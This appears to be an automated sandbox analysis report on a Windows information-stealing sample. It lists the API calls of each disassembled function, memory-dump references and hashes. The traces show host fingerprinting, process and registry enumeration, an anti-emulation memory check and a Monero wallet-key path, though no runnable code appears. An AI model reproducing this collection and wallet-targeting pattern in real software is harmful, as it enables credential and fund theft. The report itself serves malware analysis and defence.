Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 8db911fec95c41ed17788f6706e0b81468e88cee114e8f4dac46901a89885271
Instruction ID: 8add93324a0c7faa4898b5b46184f1888a060df81b0aa79808798c88b4cbd51a
Opcode Fuzzy Hash: 8db911fec95c41ed17788f6706e0b81468e88cee114e8f4dac46901a89885271
Instruction Fuzzy Hash: C6815575B10208DFCB18EF64D995AEDB7B5FF94300F50C519E8499F281DB70AA05CB82

Function 001078E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00107910
RtlAllocateHeap.NTDLL(00000000), ref: 00107917
GetComputerNameA.KERNEL32(?,00000104), ref: 0010792F

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: efe6831a3000285e63a758714b81ae0b4480059cf1ae2049c492b2f9d5a6a60e
Instruction ID: ba7e1e6b390df7ee7a6dcb10cd8607535b6d8fa9c66347c7044f910d76db4331
Opcode Fuzzy Hash: efe6831a3000285e63a758714b81ae0b4480059cf1ae2049c492b2f9d5a6a60e
Instruction Fuzzy Hash: A10186B1D04604EBC704DF98DD45BAABBBCFB04B25F104219F585E72C0C7B459048BA1

Function 00109470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00109484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 001094A5
CloseHandle.KERNEL32(00000000), ref: 001094AF

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 6e6e366e910340fc1ddf3182d187ec11b97a72933aff4f5fae54fe245145e4e2
Instruction ID: d74e07320c6119d303c65a28f209b6ebe06b1e32e0090349323d8d6296a29999
Opcode Fuzzy Hash: 6e6e366e910340fc1ddf3182d187ec11b97a72933aff4f5fae54fe245145e4e2
Instruction Fuzzy Hash: 1FF03A7490020CABDB05DFA4DC8AFE97778EB08300F004498BA499B290D7B06A85CB91

Function 000F1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 000F112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 000F1132
ExitProcess.KERNEL32 ref: 000F1143

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 7037d538a59b950c0fca82065f822f7ca6562277872131a61e90a36a314b618a
Instruction ID: 8df4143eb07389b0c4fba8d67f9885d246fb6829db3235c8e143c14a4e8f2806
Opcode Fuzzy Hash: 7037d538a59b950c0fca82065f822f7ca6562277872131a61e90a36a314b618a
Instruction Fuzzy Hash: 8DE0E67094534CFBE751ABA0DC4EB597ABCAB04B01F104154F7097A5D0D6B526409699

Function 00101A10 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

Part of subcall function 00107500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00107542
Part of subcall function 00107500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0010757F
Part of subcall function 00107500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00107603
Part of subcall function 00107500: RtlAllocateHeap.NTDLL(00000000), ref: 0010760A

Part of subcall function 0010A920: lstrcpy.KERNEL32(00000000,?), ref: 0010A972
Part of subcall function 0010A920: lstrcat.KERNEL32(00000000), ref: 0010A982

Part of subcall function 00107690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001076A4
Part of subcall function 00107690: RtlAllocateHeap.NTDLL(00000000), ref: 001076AB

Part of subcall function 001077C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0010DBC0,000000FF,?,00101C99,00000000,?,00CDDCA0,00000000,?), ref: 001077F2
Part of subcall function 001077C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0010DBC0,000000FF,?,00101C99,00000000,?,00CDDCA0,00000000,?), ref: 001077F9

Part of subcall function 00107850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000F11B7), ref: 00107880
Part of subcall function 00107850: RtlAllocateHeap.NTDLL(00000000), ref: 00107887
Part of subcall function 00107850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0010789F

Part of subcall function 001078E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00107910
Part of subcall function 001078E0: RtlAllocateHeap.NTDLL(00000000), ref: 00107917
Part of subcall function 001078E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0010792F

Part of subcall function 00107980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00110E00,00000000,?), ref: 001079B0
Part of subcall function 00107980: RtlAllocateHeap.NTDLL(00000000), ref: 001079B7
Part of subcall function 00107980: GetLocalTime.KERNEL32(?,?,?,?,?,00110E00,00000000,?), ref: 001079C4
Part of subcall function 00107980: wsprintfA.USER32 ref: 001079F3

Part of subcall function 00107A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00CDE280,00000000,?,00110E10,00000000,?,00000000,00000000), ref: 00107A63
Part of subcall function 00107A30: RtlAllocateHeap.NTDLL(00000000), ref: 00107A6A
Part of subcall function 00107A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00CDE280,00000000,?,00110E10,00000000,?,00000000,00000000,?), ref: 00107A7D

Part of subcall function 00107B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,00CDE280,00000000,?,00110E10,00000000,?,00000000,00000000), ref: 00107B35

Part of subcall function 00107B90: GetKeyboardLayoutList.USER32(00000000,00000000,001105AF), ref: 00107BE1
Part of subcall function 00107B90: LocalAlloc.KERNEL32(00000040,?), ref: 00107BF9
Part of subcall function 00107B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 00107C0D
Part of subcall function 00107B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00107C62
Part of subcall function 00107B90: LocalFree.KERNEL32(00000000), ref: 00107D22

Part of subcall function 00107D80: GetSystemPowerStatus.KERNEL32(?), ref: 00107DAD

GetCurrentProcessId.KERNEL32(00000000,?,00CDDD20,00000000,?,00110E24,00000000,?,00000000,00000000,?,00CDE298,00000000,?,00110E20,00000000), ref: 0010207E

Part of subcall function 00109470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00109484
Part of subcall function 00109470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 001094A5
Part of subcall function 00109470: CloseHandle.KERNEL32(00000000), ref: 001094AF

Part of subcall function 00107E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00107E37
Part of subcall function 00107E00: RtlAllocateHeap.NTDLL(00000000), ref: 00107E3E
Part of subcall function 00107E00: RegOpenKeyExA.KERNEL32(80000002,00CCBF90,00000000,00020119,?), ref: 00107E5E
Part of subcall function 00107E00: RegQueryValueExA.KERNEL32(?,00CDDA60,00000000,00000000,000000FF,000000FF), ref: 00107E7F
Part of subcall function 00107E00: RegCloseKey.ADVAPI32(?), ref: 00107E92

Part of subcall function 00107F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00107FC9
Part of subcall function 00107F60: GetLastError.KERNEL32 ref: 00107FD8

Part of subcall function 00107ED0: GetSystemInfo.KERNEL32(00110E2C), ref: 00107F00
Part of subcall function 00107ED0: wsprintfA.USER32 ref: 00107F16

Part of subcall function 00108100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00CDE238,00000000,?,00110E2C,00000000,?,00000000), ref: 00108130
Part of subcall function 00108100: RtlAllocateHeap.NTDLL(00000000), ref: 00108137
Part of subcall function 00108100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00108158
Part of subcall function 00108100: __aulldiv.LIBCMT ref: 00108172
Part of subcall function 00108100: __aulldiv.LIBCMT ref: 00108180
Part of subcall function 00108100: wsprintfA.USER32 ref: 001081AC

Part of subcall function 001087C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00110E28,00000000,?), ref: 0010882F
Part of subcall function 001087C0: RtlAllocateHeap.NTDLL(00000000), ref: 00108836
Part of subcall function 001087C0: wsprintfA.USER32 ref: 00108850

Part of subcall function 00108320: RegOpenKeyExA.KERNEL32(00000000,00CDB428,00000000,00020019,00000000,001105B6), ref: 001083A4

Part of subcall function 00108320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00108426
Part of subcall function 00108320: wsprintfA.USER32 ref: 00108459
Part of subcall function 00108320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0010847B
Part of subcall function 00108320: RegCloseKey.ADVAPI32(00000000), ref: 0010848C
Part of subcall function 00108320: RegCloseKey.ADVAPI32(00000000), ref: 00108499

Part of subcall function 00108680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001105B7), ref: 001086CA
Part of subcall function 00108680: Process32First.KERNEL32(?,00000128), ref: 001086DE
Part of subcall function 00108680: Process32Next.KERNEL32(?,00000128), ref: 001086F3
Part of subcall function 00108680: CloseHandle.KERNEL32(?), ref: 00108761

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0010265B

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$AllocComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 3113730047-0
Opcode ID: b484abe3d60b9d4e790c9f9a18b3e983c2d321b2f29bacdc3eb1dab6171ef215
Instruction ID: 9fea889cafed51d992d512f54536de4824991a4dc2ac358929a9e427c22885f7
Opcode Fuzzy Hash: b484abe3d60b9d4e790c9f9a18b3e983c2d321b2f29bacdc3eb1dab6171ef215
Instruction Fuzzy Hash: 81725371D50218AADB59FB50DDA1EDE733CAF34301FD082AAB156620D1EFB02B49CB65

Function 000F6D40 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c267e679d663229d8d4c17e64da720a7898b759b1a3d583cc8ab521aa09095fe
Instruction ID: 305b551ac7ac6e591a6d4288d7608f1d9831256fe990bd66faa54de2ac612310
Opcode Fuzzy Hash: c267e679d663229d8d4c17e64da720a7898b759b1a3d583cc8ab521aa09095fe
Instruction Fuzzy Hash: 6E6138B5D0020CDFCB14DF94E984BEEB7B0BB04304F1485A8E51A67681D776AE94EF91

Function 001070D0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0010718C

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
